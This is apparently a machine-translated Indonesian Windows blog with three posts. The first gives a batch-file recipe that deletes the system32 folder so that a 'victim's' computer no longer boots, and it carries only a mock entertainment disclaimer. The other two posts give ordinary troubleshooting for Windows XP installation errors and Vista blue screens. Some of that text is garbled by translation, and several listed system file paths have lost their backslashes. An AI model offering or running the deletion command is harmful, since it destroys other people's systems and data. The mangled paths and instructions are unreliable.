Jumat, 30 Mei 2014

Making HDD Format Program Classic One With Notepad

Come back this time.
We will create a program that will delete the system32 folder and then restart the computer after the computer will not run again and should be in inul, because the system does not find the existing files in the system32 folder which is required at the time of the initial boot.
Terms:
  1. The victim's computer is not using Deep Freeze program, Returnil and the like 
  2. Wearing the victim's computer Windows OS

How to wear
  1. Open notepad (Start> All Programs> Accessories> Notepad) 
  2. Copy the script below and paste it in the notepad  

"Del c:\windows\system32\*.*/q "
  1. Save as "oke.bat" (without quotes)
  2. Run the program on your computer that will disable
Just for entertainment only, do you do things that are not good 

Minggu, 25 Mei 2014

The point of fatal error problem during installation of windows XP

One time I had to face the computer installation fairly difficult, because it always fails and fails. I did get a couple of ways ranging from booting via CD, boot using USB, even some of the OS with the integration of different drivers in it, but it still can not. The process of moving files to the hard drive always corupt, for some reason when I put on a CD that I have just made, and the CDROM was already several times I change, but still, the result is always failure. Finally I try to boot using USB, when installing on the first step successfully, but the second step finding a fatal error as shown below

the cause of the problem
  1. appropriate that I described above, check your windows installation CD, if it had been scraped better you create a new installation CD again.
  2. Might occur on your computer CDROM devices are already weak, so it can not read the files on the CD perfectly.
  3. wipe your computer's CPU, by opening all the hardware that attaches to the motherboard, and of course have to be careful opening and put it back. There is a possibility of dirt on the hardware that is the cause. 
  4. And if its installation CD and CDROM you have updated, even clean the CPU you have, but still an error, if you stick 2 CPU RAM memory, the memory test by unplugging one, turn on the computer and if your computer can not boot to bios / does not appear on the screen / remove noise, means that your memory is dead or weak. and you also have to immediately buy a new memory to solve this problem
so many of my posts, hopefully useful.
experience is the greatest teacher, and basically you should be able to learn from the mistakes that you can.

Problem Blue Screen On Window Vista

In my first post, a little share experiences on how to overcome the Blue Screen on Windows Vista, In Windows Vista, blue screen error or, blue screen of death (commonly known as BSOD), is indeed the scariest error you can ever encounter. The computer will restart in a few seconds after the blue screen of death shows up.

eg in the example image below:
Many possibilities for things like this happen because of some errors due to software or hardware on your computer. Including the following:
  1. Corrupt Registry - vista blue screen of death error The registry is the lifeblood of your system. It is a single place to store information such as what hardware is attached, what system options have been selected, how computer memory is set up, and what application programs are present when the operating system starts. So obviously when something goes wrong with the registry, it can cause major problems including the blue screen of death. Unfortunately, Windows Vista does not have a built-in mechanism to fix the corrupted registry errors. You should clean your registry problems with software to clean or repair the registry, for example: CCleaner you can download here.
  2. Error when installing new hardware on your computer, for example such as the installation of VGA, RAM, Soundcard, etc.. Even though the installation do you feel right, sometimes the device driver is not compatible with your computer's operating system. The solution is you have to remove the driver / program that you install the new windows through safe mode by pressing F8 before the Windows logo appears on the startup of your computer, then go to the control panel and did the elimination of the program in the add / remove software.
  3. As for analyzing crash dump Blue Screen Error Message
    By default, your computer will restart a few seconds after the blue screen error that makes you impossible to write an error message on the screen. So, the first thing you should do is to stop Windows from rebooting when a STOP error is encountered. To do this, follow these step
       
  • Click Start -> Control Panel
  • Choose System and Maintenance.
  • Subsequently, select System.
  • Now click the Advanced system settings in the task pane on the left side.
  • On the System Properties dialog box, under Startup and Recovery, click the Settings button.
  • On the Startup and Recovery dialog box, clear the check box named Automatically restart under the heading system failure.  

When the blue screen of death is shown, jot down the STOP error code and (if exist) the filename of the driver or module that causes the problem. Then, go to Microsoft website and search for the error code and see if you can find a fix with a patch or an update. You can also google your error code and see if there’s already someone who encountered this before and got the fix.

Best way to find the cause of a vista blue screen error

Not only for a vista blue screen error, this is somehow the best way to find the cause of any problem. Follow the steps below to identify the source of your problem:
Vista bluescreen BSOD- Step 1: Go to Start -> Control Panel -> Problems Reports and Solutions -> View problem history.
Vista bluescreen BSOD- Step 2: You should now see a list of recent problems encountered. Double click on the most recent windows “shut down unexpectedly”.

  
Vista bluescreen BSOD- Step 3: You should now see the blue screen error log. Click on the “View a temporary copy of these files” to open the directory of the crash dump file. Copy the crash dump file to your desktop directory.
Vista bluescreen BSOD- Step 4: Download Microsoft Windows Debugging Tools and install it. This will add a whole set of command line tools under “C:\Program Files\Debugging Tools for Windows (x86)”.
Vista bluescreen BSOD- Step 5: Go to Start, type cmd.exe in the search box and hit enter. By default, you should be at the user profile directory, go to the directory of your Desktop by typing chdir Desktop.
Vista bluescreen BSOD- Step 6: To analyze the crash file you’ve copied just now, type “C:\Program Files\Debugging Tools for Windows (x86)\dumpchk.exe” [YourCrashFileName] and hit enter. You should now be able to see the description of the problem. Find the words Problem caused by and identify what causes the blue screen error. Then, uninstall the program that runs the error file. If you don’t know what program runs the file, google the file name and find out the source of the file.

System core files infected by virus – vista blue screen of death

Computer virus that can replicate itself into your system files are considered the most deadliest virus in the world of computer. If any of the following windows core files is infected by a virus, you’ll have to do a virus checkup and try to disinfect those that have been infected immediately. If they cannot be fixed by an antivirus program, you’ll have to do a system restore.
  • C:\Windows\explorer.exe
  • C:\Windows\system32\svchost.exe
  • C:Windowssystem321sass.exe
  • C:Windowssystem32winlogon.exe
  • C:Windowssystem32services.exe
  • C:Windowssystem32spoolsv.exe
Should you have any questions about blue screen error, please leave us your message in the comment section below. Also please share your experiences with vista blue screen of death errors, including possible solutions. New findings can help others, or maybe we can help you if you tell us your problems.

 So little about the blue screen on windows visa. see you next time.